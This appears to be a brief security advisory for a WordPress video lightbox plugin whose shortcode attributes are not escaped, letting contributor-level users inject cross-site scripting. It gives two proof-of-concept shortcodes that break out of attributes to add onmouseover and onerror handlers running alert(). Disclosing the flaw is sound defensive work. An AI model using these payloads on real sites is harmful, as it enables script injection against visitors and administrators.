The plugin does not escape the attributes of its shortcodes, allowing users with a role as low as contributor to perform Cross-Site Scripting attacks
[video_lightbox_vimeo5 video_id='"onmouseover=alert(/XSS/) b="' width="640" height="480" anchor="Click here to open vimeo video"]
[video_lightbox_vimeo5 video_id="13562192" width="640" height="480" anchor='http"onerror=alert(/XSS/)//']